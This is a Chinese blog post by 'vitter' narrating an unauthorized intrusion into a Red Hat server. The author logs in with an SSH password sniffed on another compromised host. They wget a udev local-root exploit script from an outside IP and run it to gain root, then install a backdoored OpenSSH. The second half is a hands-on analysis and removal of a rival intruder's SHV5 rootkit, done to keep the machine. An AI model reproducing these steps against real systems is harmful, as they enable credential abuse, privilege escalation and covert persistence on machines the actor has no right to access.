一台linux肉鸡的简单手工入侵检测过程
by:vitter
blog:blog.securitycn.net
今天发现一台肉鸡上某人的ssh连到另外一台服务器上,记录下了密码。
[root@mail ~]# cat /tmp/sshpswd
ldc:sle823jfsGs@222.222.66.11
直接ssh上去。
[root@mail ~]# ssh ldc@222.222.66.11
ldc@222.222.66.11′s password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r on an \m
[ldc@localhost ldc]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux
是rhel5.0没升级过内核,vmsplice的local root应该可以的,不过测试了下,机器挂了,换udev的好了。
[ldc@localhost ldc]$ mkdir .v
[ldc@localhost ldc]$ cd .v
[ldc@localhost .v]$ wget http://211.100.50.70/u.sh
–13:21:09– http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80… .. 200 OK
366 (3.3K) [application/x-sh]
Saving to: `u.sh’
100%[===========================================================================================>] 3,366 –.-K/s in 0.04s
13:21:09 (93.7 KB/s) – `u.sh’ saved [3366/3366]
[ldc@localhost .v]$ ls
r00t r00t.c u.sh
[ldc@localhost .v]$ chmod +x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk Eth Pid Groups Rmem Wmem Dump Locks
f69f8800 0 2486 00000111 0 0 00000000 2
f7fdae00 0 0 00000000 0 0 00000000 2
c2132200 6 0 00000000 0 0 00000000 2
f6a57a00 7 2143 00000001 0 0 00000000 2
f7caf000 7 0 00000000 0 0 00000000 2
f6a0be00 9 2143 00000000 0 0 00000000 2
f6a61200 9 1996 00000000 0 0 00000000 2
f7de1c00 9 0 00000000 0 0 00000000 2
f7d6ca00 10 0 00000000 0 0 00000000 2
f7fb3200 11 0 00000000 0 0 00000000 2
c2154200 15 476 ffffffff 0 0 00000000 2
f7fdac00 15 0 00000000 0 0 00000000 2
f7fb3000 16 0 00000000 0 0 00000000 2
c21cde00 18 0 00000000 0 0 00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root 477 0.0 0.0 2916 1396 ? S< 12:36 0:00 /sbin/udevd -d
ldc 3462 0.0 0.0 4128 680 pts/0 S 13:00 0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c:
suid.c:3:
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
已经是root权限了。
sh-3.1# w
13:25:18 up 48 min, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ldc pts/0 100.204.107.20 13:05 0.00s 0.12s 0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
我们先留个ssh的后门。
sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
–13:32:08– http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80… 200 OK
79990 (957K) [application/x-gzip]
Saving to: `openssh4.3p2.tar.gz’
100%[===========================================================================================>] 979,990 1.14M/s in 0.8s
13:32:08 (1.14 MB/s) – `openssh4.3p2.tar.gz’ saved [979990/979990]
sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure –prefix=/usr –sysconfdir=/etc/ssh
checking for gcc… gcc
checking for C compiler default output file name… a.out
…………(省略若干行)
sh-3.1# make && make install
conffile=`echo sshd_config.out | sed ‘s/.out$//’`; \
/bin/sed -e ‘s|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g’ -e
…………(省略若干行)
sh-3.1# cp ssh_config sshd_config /etc/ssh/
sh-3.1# /etc/rc.d/init.d/sshd restart
STOP sshd [OK]
START sshd [OK]
ok了,用我们的sshdoor登录。
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
[root@localhost ~]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod
tcp 0 0 0.0.0.0:1000 0.0.0.0:* LISTEN 2090/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2056/portmap
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 2883/vsftpd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2315/cupsd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2361/sendmail: acce
tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2303/python
总感觉这系统怪怪的,连22端口都看不到,应该替换了netstat了,先看看有没有其他被替换掉的系统文件吧。
[root@localhost ~]# rpm -qaV
S.5..UG. /bin/netstat
S.5..UG. /sbin/ifconfig
S.5….T /usr/bin/ssh-keygen
S.5….T c /etc/sysconfig/system-config-securitylevel
S.5..UG. /usr/sbin/lsof
.M…… /var/tux
S.5….T c /etc/inittab
S.5….T /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_dl14.map
S.5….T /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_ndl14.map
S.5….T /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_dl14.map
S.5….T /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_ndl14.map
S.5….T /usr/share/texmf-var/web2c/aleph.fmt
S.5….T /usr/share/texmf-var/web2c/amstex.fmt
S.5….T /usr/share/texmf-var/web2c/bamstex.fmt
S.5….T /usr/share/texmf-var/web2c/bplain.fmt
S.5….T /usr/share/texmf-var/web2c/cont-en.fmt
S.5….T /usr/share/texmf-var/web2c/etex.fmt
..5….T /usr/share/texmf-var/web2c/metafun.mem
S.5….T /usr/share/texmf-var/web2c/mf.base
..5….T /usr/share/texmf-var/web2c/mpost.mem
S.5….T /usr/share/texmf-var/web2c/mptopdf.fmt
S.5….T /usr/share/texmf-var/web2c/omega.fmt
S.5….T /usr/share/texmf-var/web2c/pdfetex.fmt
S.5….T /usr/share/texmf-var/web2c/pdftex.fmt
S.5….T /usr/share/texmf-var/web2c/tex.fmt
…….T c /etc/kdump.conf
S.5….T c /etc/printcap
..5….T c /etc/pki/nssdb/secmod.db
….L… c /etc/pam.d/system-auth
.M…… c /etc/cups/classes.conf
…….T c /etc/audit/auditd.conf
missing /usr/sbin/nscd
S.5….T c /etc/sysconfig/named
.M…… /var/named
SM5..UG. /bin/ps
SM5..UG. /usr/bin/top
SM5….T c /etc/sysconfig/iptables-config
S.5..UG. /usr/bin/find
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?….. /usr/lib/libGL.so.1.2
S.5….T c /etc/ppp/chap-secrets
S.5….T c /etc/ppp/pap-secrets
S.5….T c /etc/xml/catalog
S.5….T c /usr/share/sgml/docbook/xmlcatalog
S.5….T c /etc/ssh/ssh_config
S.5….T /usr/bin/scp
S.5….T /usr/bin/sftp
S.5….T /usr/bin/ssh
S.5….T /usr/bin/ssh-add
SM5…GT /usr/bin/ssh-agent
S.5….T /usr/bin/ssh-keyscan
S.5….T /usr/share/texmf-var/fonts/map/dvips/updmap/builtin35.map
S.5….T /usr/share/texmf-var/fonts/map/dvips/updmap/download35.map
S.5….T /usr/share/texmf-var/fonts/map/dvips/updmap/ps2pk.map
S.5….T /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_pk.map
S.5….T /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_t1.map
S.5….T /etc/sgml/docbook-slides.cat
S.5….T /usr/share/icons/hicolor/icon-theme.cache
S.5..UG. /bin/ls
S.5..UG. /usr/bin/dir
S.5..UG. /usr/bin/md5sum
S.5..UG. /usr/bin/pstree
S.5….T c /etc/syslog.conf
S.5….T c /etc/ssh/sshd_config
S.5….T /usr/sbin/sshd
missing /var/lib/texmf/ls-R
S.5….T /etc/sgml/docbook-simple.cat
S.5….T c /etc/vsftpd/vsftpd.conf
.M…… /var/ftp/pub
S.5….T c /etc/mailcap
……G. /var/cache/samba/winbindd_privileged
…….T c /etc/mail/sendmail.cf
SM5….T c /etc/mail/submit.cf
S.5….T c /var/log/mail/statistics
..5….T c /usr/lib/security/classpath.security
S.5….T c /etc/sane.d/dll.conf
还好rpm没替换,看来系统的好些命令被替换了,嘿嘿,有同行在啊。
不好意思,那我就要T你下去了。下面先检查一下,当然这个系统不可靠了,我们先替换回可靠的命令:
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
cp: cannot remove `/usr/bin/dir’: Operation not permitted
chattr加了iau了。
[root@localhost bin]# chattr -iau /usr/bin/dir
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
ok了。看看还有什么吧:
[root@localhost chkrootkit-0.48]# lsattr /bin /sbin /usr/bin /usr/sbin /etc| grep -e -ia
s—ia——- /bin/ps
s—ia——- /bin/ls
s—ia——- /bin/netstat
s—ia——- /sbin/ifconfig
s—ia——- /sbin/ttymon
s—ia——- /sbin/ttyload
s—ia——- /usr/bin/top
s—ia——- /usr/bin/md5sum
s—ia——- /usr/bin/pstree.x11
s—ia——- /usr/bin/find
s—ia——- /usr/bin/dir
s—ia——- /usr/bin/pstree
s—ia——- /usr/sbin/lsof
s—ia——- /usr/sbin/ttyload
s—ia——- /etc/sh.conf
[root@localhost bin]# chattr -iau ps ls netstat
[root@localhost bin]# rm -rf ps ls netstat
[root@localhost bin]# rz
rz waiting to receive.奫root@localhost bin]# chmod +x ps ls netstat
[root@localhost bin]# chattr +iau ps ls netstat
同样的方式把/usr/sbin/lsof、/usr/bin/find等都替换回来。
再用netstat看看端口吧:
[root@localhost bin]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod
tcp 0 0 0.0.0.0:1000 0.0.0.0:* LISTEN 2090/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2056/portmap
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 2883/vsftpd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2315/cupsd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2361/sendmail: acce
tcp 0 0 0.0.0.0:65530 0.0.0.0:* LISTEN 2663/ttyload (有东东出来了吧)
tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2303/python
tcp 0 0 :::22 :::* LISTEN 13935/sshd
现在再用chkrootkit和rkhunter查一下看看:
[root@localhost .v]# ls
chkrootkit-0.48 chkrootkit.tar.gz rkhunter rkhunter-1.2.7.tar.gz
[root@localhost .v]# cd chkrootkit-0.48/
[root@localhost chkrootkit-0.48]# ./chkrootkit
ROOTDIR is `/’
Checking `amd’… not found
Checking `basename’… not infected
…………(省略若干行)
Checking `ifconfig’… INFECTED
…………(省略若干行)
Checking `pstree’… INFECTED
…………(省略若干行)
Checking `top’… INFECTED
…………(省略若干行)
Searching for t0rn’s v8 defaults… Possible t0rn v8 \(or variation\) rootkit installed
…………(省略若干行)
Searching for Showtee… Warning: Possible Showtee Rootkit installed
…………(省略若干行)
Searching for Romanian rootkit… /usr/include/file.h /usr/include/proc.h
…………(省略若干行)
上面几行都是有问题的。
下面用rkhunter,它的log存在/var/log/rkhunter.log里面
[root@localhost rkhunter]# /usr/local/bin/rkhunter -c –createlogfile
Rootkit Hunter 1.2.7 is running
Determining OS… Unknown
Warning: This operating system is not fully supported!
Warning: Cannot find md5_not_known
All MD5 checks will be skipped! (md5sum被替换了)
…………(省略若干行)
Rootkit ‘SHV4′… [ Warning! ] (SHV4)
——————————————————————————–
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
–createlogfile and check the log file (current file: /var/log/rkhunter.log).
——————————————————————————–
[Press <ENTER> to continue]
Rootkit ‘SHV5′… [ Warning! ] (SHV5)
——————————————————————————–
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
–createlogfile and check the log file (current file: /var/log/rkhunter.log).
——————————————————————————–
…………(省略若干行)
Scanning took 84 seconds
Scan results written to logfile (/var/log/rkhunter.log)
———————————————————————–
Do you have some problems, undetected rootkits, false positives, ideas
or suggestions?
Please e-mail me by filling in the contact form (@http://www.rootkit.nl)
———————————————————————–
下面我们看下log:
[root@localhost rkhunter]# cat /var/log/rkhunter.log
[15:16:51] Running Rootkit Hunter 1.2.7 on localhost.localdomain
[15:16:51]
Rootkit Hunter 1.2.7, Copyright 2003-2005, Michael Boelen
…………(省略若干行)
[15:16:55] *** Start scan SHV4 ***
[15:16:55] – File /etc/ld.so.hash… OK. Not found.
[15:16:55] – File /lib/libext-2.so.7… OK. Not found.
[15:16:55] – File /lib/lidps1.so… WARNING! Exists. (找到一个文件)
[15:16:55] – File /usr/sbin/xntps… OK. Not found.
[15:16:55] – Directory /lib/security/.config… OK. Not found.
[15:16:55] – Directory /lib/security/.config/ssh… OK. Not found.
[15:17:04] *** Start scan SHV5 ***
[15:17:04] – File /etc/sh.conf… WARNING! Exists. (找到一个文件)
[15:17:04] – File /dev/srd0… OK. Not found.
[15:17:04] – Directory /usr/lib/libsh… WARNING! Exists. (找到一个目录)
…………(省略若干行)
下面手工核对下,因为工具都是对已有的检查,如果改过的,他就找不到了。
[root@localhost sbin]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:65530 0.0.0.0:* LISTEN 2663/ttyload
…………(省略若干行)
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 2679/ttymon
…………(省略若干行)
发现2个不正常的
[root@localhost sbin]# ps aux|grep 2663
root 2663 0.0 0.0 2128 516 ? Ss 12:37 0:00 /sbin/ttyload -q (原型出来了)
root 15350 0.0 0.0 4088 604 pts/0 S+ 15:21 0:00 grep 2663
[root@localhost sbin]# lsof -p 2663
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
3 2663 root cwd DIR 253,0 4096 2 /
3 2663 root rtd DIR 253,0 4096 2 /
3 2663 root txt REG 253,0 652620 34897965 /tmp/sh-AQJ3OQYACSO (deleted) (是个压缩的)
3 2663 root mem REG 253,0 121684 8586729 /lib/ld-2.5.so
3 2663 root mem REG 253,0 1576952 8586730 /lib/libc-2.5.so
3 2663 root mem REG 253,0 101036 8586743 /lib/libnsl-2.5.so
3 2663 root mem REG 253,0 15264 8586757 /lib/libutil-2.5.so
3 2663 root mem REG 253,0 27836 8585303 /lib/libcrypt-2.5.so
3 2663 root 0u CHR 1,3 1517 /dev/null
3 2663 root 1u CHR 1,3 1517 /dev/null
3 2663 root 2u CHR 1,3 1517 /dev/null
3 2663 root 3u IPv4 9895 TCP *:65530 (LISTEN)
[root@localhost sbin]# lsof -p 2679
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
ttymon 2679 root cwd DIR 253,0 4096 2 /
ttymon 2679 root rtd DIR 253,0 4096 2 /
ttymon 2679 root txt REG 253,0 93476 852119 /sbin/ttymon
ttymon 2679 root mem REG 253,0 46740 8585257 /lib/libnss_files-2.5.so
ttymon 2679 root mem REG 253,0 121684 8586729 /lib/ld-2.5.so
ttymon 2679 root mem REG 253,0 1576952 8586730 /lib/libc-2.5.so
ttymon 2679 root 3u raw 9925 00000000:0001->00000000:0000 st=07
监听65530端口的是个ssh后门:
[root@localhost sbin]# nc 127.0.0.1 65530
SSH-1.5-2.0.13
Protocol mismatch.
密码应该在:
[root@localhost sbin]# cat /etc/sh.conf
76800957735704ee3dd8ac42779db49a -
加密了,我们再看看另外一个配置文件:
[root@localhost sbin]# cat /lib/lidps1.so
ttyload
shsniff
shp
shsb
hide
burim
synscan
mirkforce
ttymon
sh2-power
看来是ps的配置文件。
看看另外一个进程:
[root@localhost sbin]# strings /sbin/ttymon
…………(省略若干行)
Usage: %s <dst> <src> <size> <number>
Ports are set to send and receive on port 179
dst: Destination Address
src: Source Address
size: Size of packet which should be no larger than 1024 should allow for xtra header info thru routes
num: packets
Could not resolve %s fucknut
根据这个Google了下,应该是个dos工具。感兴趣的可以编译下玩玩看看:http://www.securityfocus.com/archive/82/334848这里有。
ok我们现在进入黑客的老巢:
[root@localhost sbin]# cd /usr/lib/libsh
[root@localhost libsh]# ls -al
total 140
drwxr-xr-x 6 root root 4096 Dec 18 2008 .
drwxr-xr-x 118 root root 69632 Jul 17 13:55 ..
drwxr-xr-x 2 root root 4096 Dec 18 2008 .backup
-rwxr-xr-x 1 122 114 1206 Apr 18 2003 .bashrc
-rwxr-xr-x 1 122 114 2000 Nov 28 2006 hide
drwxr-xr-x 2 root root 4096 Dec 18 2008 .owned
-rwxr-xr-x 1 122 114 1345 Nov 28 2006 shsb
drwxr-xr-x 2 root root 4096 Jul 14 04:03 .sniff
drwxr-xr-x 2 gaobo gaobo 4096 Nov 28 2006 utilz
[root@localhost libsh]# ls .backup/
dir find ifconfig ls lsof md5sum netstat ps pstree top
上面就是我们系统备份的文件,直接恢复即可。
find搜下其他的配置文件。此步骤省略。最后都找到了:
[root@localhost libsh]# find / -nouser
/lib/libsh.so/shhk.pub
/lib/libsh.so/shhk
/lib/libsh.so/shrs
…………(省略若干行)
[root@localhost libsh]# cd /lib/libsh.so/
[root@localhost libsh.so]# ls
bash shdcf shhk shhk.pub shrs
这个目录是ssh的配置文件
其他的用关键字就可以了:如find / -name “*” -exec grep -l “ttyload” {} \;
[root@localhost lib]# cat /usr/include/proc.h
3 burim
3 mirkforce
3 synscan
3 ttyload
3 shsniff
3 ttymon
3 shsb
3 shp
3 hide
4 ttyload
[root@localhost lib]# cat /usr/include/file.h
sh.conf
libsh
.sh
system
shsb
libsh.so
shp
shsniff
srd0
[root@localhost lib]# cat /usr/include/hosts.h
2 212.110
2 195.26
2 194.143
2 62.220
3 2002
4 2002
3 6667
4 6667
3 65530
4 65530
[root@localhost lib]# cat /usr/include/log.h
mirkforce
synscan
syslog
那看看他怎么启动的:
[root@localhost lib]# cat /etc/inittab
#
# inittab This file describes how the INIT process should set up
# the system in a certain run-level.
#
# Author: Miquel van Smoorenburg, <miquels@drinkel.nl.mugnet.org>
# Modified for RHS Linux by Marc Ewing and Donnie Barnes
#
# Default runlevel. The runlevels used by RHS are:
# 0 – halt (Do NOT set initdefault to this)
# 1 – Single user mode
# 2 – Multiuser, without NFS (The same as 3, if you do not have networking)
# 3 – Full multiuser mode
# 4 – unused
# 5 – X11
# 6 – reboot (Do NOT set initdefault to this)
#
id:5:initdefault:
# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
l0:0:wait:/etc/rc.d/rc 0
l1:1:wait:/etc/rc.d/rc 1
l2:2:wait:/etc/rc.d/rc 2
l3:3:wait:/etc/rc.d/rc 3
l4:4:wait:/etc/rc.d/rc 4
l5:5:wait:/etc/rc.d/rc 5
l6:6:wait:/etc/rc.d/rc 6
# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
# When our UPS tells us power has failed, assume we have a few minutes
# of power left. Schedule a shutdown for 2 minutes from now.
# This does, of course, assume you have powerd installed and your
# UPS connected and working correctly.
pf::powerfail:/sbin/shutdown -f -h +2 “Power Failure; System Shutting Down”
# If power was restored before the shutdown kicked in, cancel it.
pr:12345:powerokwait:/sbin/shutdown -c “Power Restored; Shutdown Cancelled”
# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
# Loading standard ttys
0:2345:once:/usr/sbin/ttyload (在这里了)
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
# modem getty.
# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem
# fax getty (hylafax)
# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem
# vbox (voice box) getty
# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6
# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7
# end of /etc/inittab
看看他的启动文件:
[root@localhost lib]# cat /usr/sbin/ttyload
/sbin/ttyload -q >/dev/null 2>&1
/sbin/ttymon >/dev/null 2>&1
以上除了工具,我们通过手工的方式对rootkit进行了一些简单的分析,这个是个没有修改过的SHV5。以上只是一些思路,在对待入侵问题上要具体问题具体分析,这个相对简单了点。